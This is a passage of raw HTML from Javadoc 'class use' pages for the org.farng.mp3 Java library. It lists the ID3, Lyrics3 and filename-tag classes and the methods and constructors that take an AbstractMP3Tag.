CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>FilenameTag.</B><B><A HREF="../../../../org/farng/mp3/filename/FilenameTag.html#overwrite(org.farng.mp3.AbstractMP3Tag)">overwrite</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;abstractMP3Tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>FilenameTag.</B><B><A HREF="../../../../org/farng/mp3/filename/FilenameTag.html#write(org.farng.mp3.AbstractMP3Tag)">write</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;abstractMP3Tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>FilenameParenthesis.</B><B><A HREF="../../../../org/farng/mp3/filename/FilenameParenthesis.html#matchAgainstTag(org.farng.mp3.AbstractMP3Tag)">matchAgainstTag</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;matchTag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Match all elements of this composite against the given tag.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>FilenameDelimiter.</B><B><A HREF="../../../../org/farng/mp3/filename/FilenameDelimiter.html#matchAgainstTag(org.farng.mp3.AbstractMP3Tag)">matchAgainstTag</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;matchTag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Match all elements of this composite against the given tag.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>abstract &nbsp;void</CODE></FONT></TD> <TD><CODE><B>AbstractFilenameComposite.</B><B><A HREF="../../../../org/farng/mp3/filename/AbstractFilenameComposite.html#matchAgainstTag(org.farng.mp3.AbstractMP3Tag)">matchAgainstTag</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;matchTag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Match all elements of this composite against the given tag.</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.farng.mp3.id3"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A> in <A HREF="../../../../org/farng/mp3/id3/package-summary.html">org.farng.mp3.id3</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Subclasses of <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A> in <A HREF="../../../../org/farng/mp3/id3/package-summary.html">org.farng.mp3.id3</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/AbstractID3.html" title="class in org.farng.mp3.id3">AbstractID3</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Superclass for all ID3 tags</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/AbstractID3v1.html" title="class in org.farng.mp3.id3">AbstractID3v1</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Superclass for all ID3v1 tags.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/AbstractID3v2.html" title="class in org.farng.mp3.id3">AbstractID3v2</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Superclass for all ID3v2 tags</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/ID3v1.html" title="class in org.farng.mp3.id3">ID3v1</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<TABLE border=0> <TBODY> <TD class=h2>What is ID3 (v1)?</TBODY> <TABLE border=0> <TBODY> <TR vAlign=top> </TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/ID3v1_1.html" title="class in org.farng.mp3.id3">ID3v1_1</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<TABLE border=0> <TBODY> <TD class=h2>What is ID3v1.1?</TBODY> <TABLE border=0> <TBODY> <TR vAlign=top> </TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_2.html" title="class in org.farng.mp3.id3">ID3v2_2</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<p class=t> The two biggest design goals were to be able to implement ID3v2 without disturbing old software too much and that ID3v2 should be expandable.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_3.html" title="class in org.farng.mp3.id3">ID3v2_3</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<p class=t> The two biggest design goals were to be able to implement ID3v2 without disturbing old software too much and that ID3v2 should be as flexible and expandable as possible.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_4.html" title="class in org.farng.mp3.id3">ID3v2_4</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ID3v2 is a general tagging format for audio, which makes it possible<br> &nbsp;&nbsp; to store meta data about the audio inside the audio file itself.</TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Methods in <A HREF="../../../../org/farng/mp3/id3/package-summary.html">org.farng.mp3.id3</A> with parameters of type <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v2_4.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_4.html#append(org.farng.mp3.AbstractMP3Tag)">append</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v2_4.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_4.html#overwrite(org.farng.mp3.AbstractMP3Tag)">overwrite</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v2_4.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_4.html#write(org.farng.mp3.AbstractMP3Tag)">write</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v2_3.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_3.html#append(org.farng.mp3.AbstractMP3Tag)">append</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v2_3.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_3.html#overwrite(org.farng.mp3.AbstractMP3Tag)">overwrite</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v2_3.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_3.html#write(org.farng.mp3.AbstractMP3Tag)">write</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v2_2.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_2.html#append(org.farng.mp3.AbstractMP3Tag)">append</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v2_2.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_2.html#overwrite(org.farng.mp3.AbstractMP3Tag)">overwrite</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v2_2.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_2.html#write(org.farng.mp3.AbstractMP3Tag)">write</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v1_1.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v1_1.html#append(org.farng.mp3.AbstractMP3Tag)">append</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v1_1.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v1_1.html#overwrite(org.farng.mp3.AbstractMP3Tag)">overwrite</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v1_1.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v1_1.html#write(org.farng.mp3.AbstractMP3Tag)">write</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v1.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v1.html#append(org.farng.mp3.AbstractMP3Tag)">append</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v1.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v1.html#overwrite(org.farng.mp3.AbstractMP3Tag)">overwrite</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ID3v1.</B><B><A HREF="../../../../org/farng/mp3/id3/ID3v1.html#write(org.farng.mp3.AbstractMP3Tag)">write</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>AbstractID3v2.</B><B><A HREF="../../../../org/farng/mp3/id3/AbstractID3v2.html#append(org.farng.mp3.AbstractMP3Tag)">append</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;abstractMP3Tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>AbstractID3v2.</B><B><A HREF="../../../../org/farng/mp3/id3/AbstractID3v2.html#overwrite(org.farng.mp3.AbstractMP3Tag)">overwrite</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;abstractMP3Tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>AbstractID3v2.</B><B><A HREF="../../../../org/farng/mp3/id3/AbstractID3v2.html#write(org.farng.mp3.AbstractMP3Tag)">write</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;abstractMP3Tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Constructors in <A HREF="../../../../org/farng/mp3/id3/package-summary.html">org.farng.mp3.id3</A> with parameters of type <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_4.html#ID3v2_4(org.farng.mp3.AbstractMP3Tag)">ID3v2_4</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;mp3tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Creates a new ID3v2_4 object.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_3.html#ID3v2_3(org.farng.mp3.AbstractMP3Tag)">ID3v2_3</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;mp3tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Creates a new ID3v2_3 object.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/ID3v2_2.html#ID3v2_2(org.farng.mp3.AbstractMP3Tag)">ID3v2_2</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;mp3tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Creates a new ID3v2_2 object.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/ID3v1_1.html#ID3v1_1(org.farng.mp3.AbstractMP3Tag)">ID3v1_1</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;mp3tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Creates a new ID3v1_1 object.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../../org/farng/mp3/id3/ID3v1.html#ID3v1(org.farng.mp3.AbstractMP3Tag)">ID3v1</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;mp3tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Creates a new ID3v1 object.</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.farng.mp3.lyrics3"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A> in <A HREF="../../../../org/farng/mp3/lyrics3/package-summary.html">org.farng.mp3.lyrics3</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Subclasses of <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A> in <A HREF="../../../../org/farng/mp3/lyrics3/package-summary.html">org.farng.mp3.lyrics3</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/farng/mp3/lyrics3/AbstractLyrics3.html" title="class in org.farng.mp3.lyrics3">AbstractLyrics3</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Super class for both Lyrics3v2 and Lyrics3v2 tags</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/farng/mp3/lyrics3/Lyrics3v1.html" title="class in org.farng.mp3.lyrics3">Lyrics3v1</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<TABLE border=0> <TBODY> <TD class=h1>&nbsp;Lyrics3 made easy&nbsp; </TBODY> <BR>&nbsp; <TABLE border=0> <TBODY> <TD class=h2>What is Lyrics3?</TBODY> <TABLE border=0> <TBODY> <TR vAlign=top> </TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/farng/mp3/lyrics3/Lyrics3v2.html" title="class in org.farng.mp3.lyrics3">Lyrics3v2</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<TABLE border=0> <TBODY> <TD class=h2>What is Lyrics3 v2.00?</TBODY> <TABLE border=0> <TBODY> <TR vAlign=top> </TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Methods in <A HREF="../../../../org/farng/mp3/lyrics3/package-summary.html">org.farng.mp3.lyrics3</A> with parameters of type <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>Lyrics3v2.</B><B><A HREF="../../../../org/farng/mp3/lyrics3/Lyrics3v2.html#append(org.farng.mp3.AbstractMP3Tag)">append</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>Lyrics3v2.</B><B><A HREF="../../../../org/farng/mp3/lyrics3/Lyrics3v2.html#overwrite(org.farng.mp3.AbstractMP3Tag)">overwrite</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>Lyrics3v2.</B><B><A HREF="../../../../org/farng/mp3/lyrics3/Lyrics3v2.html#write(org.farng.mp3.AbstractMP3Tag)">write</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>Lyrics3v1.</B><B><A 